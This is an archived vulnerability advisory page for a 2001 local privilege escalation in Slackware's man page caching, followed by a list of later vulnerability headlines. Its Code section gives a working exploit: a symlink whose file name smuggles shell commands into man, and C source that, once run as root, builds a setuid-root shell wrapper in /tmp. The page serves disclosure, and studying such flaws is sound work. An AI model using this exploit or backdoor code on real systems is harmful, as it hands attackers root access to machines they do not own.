exploits , vulnerabilities , articles , Slackware Malicious Manual Page Cache File Creation Vulnerability

Title	Slackware Malicious Manual Page Cache File Creation Vulnerability
Published	2001-07-17-12:00AM
Updated	2001-07-18-11:17AM
Class	Configuration Error
CVE	CVE-MAP-NOMATCH
Remote	No
Local	Yes
Credit	Reported to Bugtraq by <josh@pulltheplug.org> on July 17, 2001.
Vulnerable	Slackware Linux 8.0 Slackware Linux 7.1 Slackware Linux 7.0
Not Vulnerable
Code	The following method of exploitation has been suggested by <josh@pulltheplug.org>: ln -s "/usr/man/man7/man.7.gz;cd;cd ..;cd ..;cd ..;cd ..;cd tmp;export PATH=.;script;man.7" /var/man/cat7/man.7.gz When `/usr/bin/man man` is executed by root, it will create /var/man/cat7/man.1.gz. The symlink forces it to create a file in /usr/man/man7 named: "/usr/man/man7/man.7.gz;cd;cd ..;cd ..;cd ..;cd ..;cd tmp;exportPATH=.;script;man.7.gz." /usr/bin/man will then execute /tmp/script which contains: #include <stdio.h> #include <unistd.h> #include <sys/types.h> #include <sys/stat.h> #include <sys/wait.h> #include <errno.h> int main() { FILE *fil; mode_t perm = 06711; if(!getuid()) { fil = fopen("/tmp/bleh.c","w"); fprintf(fil,"%s ","#include <unistd.h>"); fprintf(fil,"%s ","#include <stdio.h>"); fprintf(fil,"%s ","int main() {"); fprintf(fil,"%s ","setreuid(0,0);setregid(0,0);"); fprintf(fil,"%s ","execl("/bin/su","su",NULL);"); fprintf(fil,"%s ","return 0; }"); fclose(fil); system("/usr/bin/gcc -o /tmp/bleh /tmp/bleh.c"); unlink("/tmp/bleh.c"); chmod("/tmp/bleh", perm); } execl("/usr/bin/man","man","/usr/man/man7/man.7.gz",NULL); return 0; }
TXT

Vulnerabilities - newest 10 RSS | More

• 2009-12-17 Mozilla Firefox and SeaMonkey Theora Video Library Remote Integer Overflow Vulnerability
• 2009-12-17 Mozilla Firefox and Sea Monkey Insecure Protocol Location Bar Spoofing Vulnerability
• 2009-12-17 Mozilla Firefox and Sea Monkey Content Injection Spoofing Vulnerability
• 2009-12-17 Mozilla Firefox/SeaMonkey GeckoActiveXObject Exception Message COM Object Enumeration Vulnerability
• 2009-12-16 ZABBIX Denial Of Service and SQL Injection Vulnerabilities
• 2009-12-16 IBM WebSphere Application Server JNDI Remote Information Disclosure Vulnerability
• 2009-12-16 Horde Application Framework Administration Interface Cross-Site Scripting Vulnerability
• 2009-12-16 Mozilla Firefox and SeaMonkey MFSA 2009-65 through -71 Multiple Vulnerabilities
• 2009-12-16 Merkaartor Insecure Temporary File Creation Vulnerability
• 2009-12-15 TYPO3 Watchdog (aba_watchdog) Unspecified Information Disclosure Vulnerability

• Vulnerabilities
• Exploits
• News
• Articles

Copyright 2007, SecurityDot
Thu, 17 Dec 2009 08:03:37 +0000